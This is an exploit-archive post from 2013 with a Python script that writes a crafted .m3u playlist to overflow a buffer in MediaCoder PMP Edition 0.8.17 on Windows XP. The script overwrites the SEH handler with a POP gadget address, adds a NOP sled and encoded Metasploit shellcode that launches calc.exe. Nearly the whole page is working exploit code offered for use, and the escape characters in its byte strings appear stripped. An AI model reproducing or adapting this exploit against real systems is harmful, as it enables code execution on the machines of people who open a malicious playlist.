Home / exploits MediaCoder PMP Edition 0.8.17 Buffer Overflow
Posted on 22 June 2013
print """ [+]Exploit Title: MediaCoder PMP Edition 0.8.17 Buffer Overflow Exploit (SEH) [+]Download link: http://www.mediacoderhq.com/device/mpx.htm [+]Vulnerable Product: MediaCoder (Personal Media Player) Edition [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """ from struct import pack junk = "http://" + "x41" * 765 nseh = "xebx06x90x90" seh = pack('<I',0x66D81575)#66D81575 5F POP EDI avutil-52.dll nops= "x90" * 80 #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b 'x00x0ax0dx5c' -t c shell=("xbfx8exa0x35xacxdaxdaxd9x74x24xf4x5bx2bxc9xb1" "x33x83xc3x04x31x7bx0ex03xf5xaexd7x59xf5x47x9e" "xa2x05x98xc1x2bxe0xa9xd3x48x61x9bxe3x1bx27x10" "x8fx4exd3xa3xfdx46xd4x04x4bxb1xdbx95x7dx7dxb7" "x56x1fx01xc5x8axffx38x06xdfxfex7dx7ax10x52xd5" "xf1x83x43x52x47x18x65xb4xccx20x1dxb1x12xd4x97" "xb8x42x45xa3xf3x7axedxebx23x7bx22xe8x18x32x4f" "xdbxebxc5x99x15x13xf4xe5xfax2ax39xe8x03x6axfd" "x13x76x80xfexaex81x53x7dx75x07x46x25xfexbfxa2" "xd4xd3x26x20xdax98x2dx6exfex1fxe1x04xfax94x04" "xcbx8bxefx22xcfxd0xb4x4bx56xbcx1bx73x88x18xc3" "xd1xc2x8ax10x63x89xc0xe7xe1xb7xadxe8xf9xb7x9d" "x80xc8x3cx72xd6xd4x96x37x28x9fxbbx11xa1x46x2e" "x20xacx78x84x66xc9xfax2dx16x2exe2x47x13x6axa4" "xb4x69xe3x41xbbxdex04x40xd8x81x96x08x31x24x1f" "xaax4d") exploit = junk + nseh + seh + nops + shell try: rst= open("mediacoder-pmp.m3u",'w') rst.write(exploit) rst.close() raw_input(" Exploit file created! ") except: print "Error"
